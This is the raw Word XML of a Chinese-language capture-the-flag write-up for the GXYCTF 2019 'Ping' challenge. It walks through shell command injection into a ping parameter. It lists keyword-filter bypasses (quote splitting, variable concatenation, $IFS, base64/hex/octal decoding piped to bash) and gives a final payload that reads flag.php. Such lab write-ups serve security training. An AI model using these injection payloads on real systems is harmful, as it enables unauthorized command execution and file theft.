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5929" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C74210">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t xml:space="preserve">[GXYCTF </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>2019]Ping</w:t>
      </w:r>
      <w:proofErr w:type="gram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Ping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Ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76954D5D" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C74210">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>看到题目先ping一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5CFF6" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C74210">
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1CE529" wp14:editId="15904F35">
            <wp:extent cx="5274310" cy="3317240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="456998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98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EDA" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C74210">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试获取flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C22FCE9" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C74210">
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C3B5AA7" wp14:editId="6C118D8F">
            <wp:extent cx="5274310" cy="1691640"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="6396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0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36B6" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C74210">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现有过滤，搜了一下基础的绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38A334" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C7421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8536A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>黑名单(关键字）绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD9FFD9" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C742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单引号、双引号绕过：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c"at"t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fl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''ag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38E857" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C742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反斜线绕过：ca\t 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fl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\ag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453660DE" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C7421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和</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F09E0" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C74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Symbol" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w: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 @绕过：c$1at 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fl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$@ag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719ABF6C" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C74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Symbol" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w: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 拼接绕过：a=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c;b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at;c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fl;d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=ag; $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a$b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$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c$d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（不用加｜） </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE8566" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C7421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/?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=127.0.0.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1;a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=g;cat$IFS$1fla$a.php或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A407AF0" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C7421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/?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18536A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1;a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0018536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f;d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ag;c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l;cat$IFS$a$c$d.php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6B91DB5" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C74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 base64： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B57E66" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C742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echo "Y2F0IGZsYWc="|base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBEDA22" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C742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echo "Y2F0IGZsYWc="|base64 -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d|bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73C32456" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C7421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|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2055FD37" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C74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Symbol" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w: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 hex编码绕过： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFF821" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C7421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echo "0x63617420666c61670a" | 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xxd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-r -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p|bash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43ED8F7" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C74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Symbol" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t></w:t>
      </w:r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 oct编码绕过： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A164070" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C742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$(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 "\x63\x61\x74\x20\x66\x6c\x61\x67")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B2F82E" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C7421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36A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18536A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18536A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,"\x63\x61\x74\x20\x66\x6c\x61\x67</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"}|</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7E157" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C742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BC9E59" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C742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138AB6" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C742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BD1B71" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C742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ayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:127.0.0.1;</w:t>
      </w:r>
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:rStyle w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
        </w:rPr>
        <w:t>|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh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D2A826" w14:textId="77777777" w:rsidR="00C74210" w:rsidRPr="0018536A" w:rsidRDefault="00C74210" w:rsidP="00C7421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得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74899B6F" w14:textId="77777777" w:rsidR="00C74210" w:rsidRDefault="00C74210" w:rsidP="00C74210">
      <w:r w:rsidRPr="0018536A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78709F6E" wp14:editId="13A1422A">
            <wp:extent cx="5274310" cy="1217930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1989476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76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E891" w14:textId="77777777" w:rsidR="00EC54AB" w:rsidRPr="00C74210" w:rsidRDefault="00EC54AB" w:rsidP="00C74210"/>
    <w:sectPr w:rsidR="00EC54AB" w:rsidRPr="00C74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29DA" w14:textId="77777777" w:rsidR="008920A2" w:rsidRDefault="008920A2" w:rsidP="00C74210">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6935A069" w14:textId="77777777" w:rsidR="008920A2" w:rsidRDefault="008920A2" w:rsidP="00C74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A176" w14:textId="77777777" w:rsidR="008920A2" w:rsidRDefault="008920A2" w:rsidP="00C74210">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60BB62EE" w14:textId="77777777" w:rsidR="008920A2" w:rsidRDefault="008920A2" w:rsidP="00C74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47B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D3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E675C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF0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B5E00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5B2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5207A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25C8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F7B34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A01A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764969">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="729579023">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1664046240">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1081835404">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="182473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5F"/>
    <w:rsid w:val="008920A2"/>
    <w:rsid w:val="00C74210"/>
    <w:rsid w:val="00EC54AB"/>
    <w:rsid w:val="00F8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643779F-9CB9-4F73-B96A-00FA59AB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210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21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7421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C7421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某</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>王 某</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-08T15:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-08T15:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>